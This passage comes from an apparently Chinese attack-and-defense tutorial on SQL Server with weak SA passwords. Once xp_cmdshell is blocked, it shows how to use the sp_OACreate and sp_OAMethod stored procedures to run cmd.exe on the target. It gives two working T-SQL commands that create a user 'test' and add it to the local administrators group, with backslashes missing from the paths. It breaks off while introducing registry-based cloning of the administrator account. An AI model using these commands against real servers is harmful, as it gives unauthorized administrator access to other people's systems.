Microsoft SQL Server SA弱口令攻防实战

核心提示： 图x.5查询分析器的界面但如果对方把Microsoft SQLServer中的xplog70.dll文件删除或放到其他地方了， xp_cmdshell就无法执行我们发出的命令了，Microsoft SQL Server SA弱口令攻防实战(3)，难道就没有其他办法了？当然不是，在Micro

图x.5　查询分析器的界面

但如果对方把Microsoft SQLServer中的xplog70.dll文件删除或放到其他地方了， xp_cmdshell就无法执行我们发出的命令了。

难道就没有其他办法了？当然不是，在Microsoft SQLServer中有一系列与OLE相关的存储过程，这一系列的存储过程同Xp_cmdshell以及读取注册表系列的存储过程一样危险，但是其使用方法不象那些存储过程在网络上和书上介绍的那样多，所以被删除的可能性就小一些。这系列的存储过程有sp_OACreate，sp_OADestroy，sp_OAGetErrorInfo，sp_OAGetProperty，sp_OAMethod，sp_OASetProperty，sp_OAStop。

使用查询分析器连接到对方的Microsoft SQLServer，在查询分析器中执行：

DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC
SP_OAMETHOD @shell,'run',null, 'c:WINNTsystem32cmd.exe /c net user test
12345 /add'--
再执行：DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT
EXEC SP_OAMETHOD @shell,'run',null, 'c:WINNTsystem32cmd.exe /c net
localgroup administrators test /add '--

就可以在对方的系统添加一个用户名为test，密码为12345，有管理员权限的用户。

如果对方把Xp_cmdshell、SP_OACREATE等可执行系统命令的存储过程，以及与它们相对应的动态连接库文件删除了，我们还有一个办法，就是使用可以读取和修改注册表的存储过程来克隆对方系统的管理员用户。在查询分析器里运行下面的语句：